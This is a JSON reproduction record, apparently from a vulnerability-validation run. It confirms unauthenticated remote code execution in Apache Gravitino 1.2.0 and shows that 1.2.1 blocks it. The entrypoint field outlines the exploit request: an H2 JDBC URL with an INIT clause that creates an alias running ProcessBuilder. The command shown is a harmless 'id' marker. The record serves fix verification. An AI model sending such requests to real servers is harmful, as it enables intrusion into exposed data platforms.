{
  "entrypoint_kind": "endpoint",
  "entrypoint_detail": "Unauthenticated POST /api/metalakes/test_ml/catalogs/testConnection with provider=jdbc-postgresql, jdbc-driver=org.h2.Driver, and a malicious jdbc-url beginning jdbc:h2:mem:<rand>;INIT=CREATE ALIAS EXEC AS '...ProcessBuilder(\"id > marker\")...';CALL EXEC().",
  "service_started": true,
  "healthcheck": "GET /api/version returned code=0 on both Apache Gravitino 1.2.0 and 1.2.1 servers before exploit attempts.",
  "vulnerable_version": {
    "version": "1.2.0",
    "git_commit": "1c1665f05e24f69833bcedfb0e6dc6b477f95dc4",
    "rce_confirmed": true,
    "attempts_confirmed": 2,
    "request_status": 200,
    "request_body": "{\"code\":0}",
    "marker_content": "uid=1000(vscode) gid=1000(vscode) groups=1000(vscode)"
  },
  "fixed_version": {
    "version": "1.2.1",
    "git_commit": "e88bffcfc31b7a656c960245b63b1e4c4901b8ee",
    "rce_confirmed": false,
    "request_status": 500,
    "blocking_message": "H2 JDBC URL is not allowed in catalog configuration",
    "marker_created": false
  },
  "idempotency": {
    "runs_executed": 2,
    "exit_codes": [0, 0],
    "consistent": true
  },
  "runtime_environment": {
    "java": "OpenJDK 17.0.19",
    "target": "Official Apache Gravitino binary tarballs",
    "h2_driver": "H2 1.4.200 bundled on the server classpath",
    "server_config": "Default SimpleAuthenticator with authorization disabled"
  },
  "evidence_paths": {
    "orchestrator_log": "bundle/logs/reproduction_steps.log",
    "vulnerable_attempt_logs": ["bundle/logs/vuln_attempt_1.log", "bundle/logs/vuln_attempt_2.log"],
    "fixed_attempt_logs": ["bundle/logs/fixed_attempt_1.log", "bundle/logs/fixed_attempt_2.log"],
    "vulnerable_marker": "bundle/logs/rce_marker_vuln_latest.txt",
    "vulnerable_server_log": "bundle/logs/vuln_server.log",
    "fixed_server_log": "bundle/logs/fixed_server.log",
    "validation_verdict": "bundle/repro/validation_verdict.json",
    "rca_report": "bundle/repro/rca_report.md"
  }
}
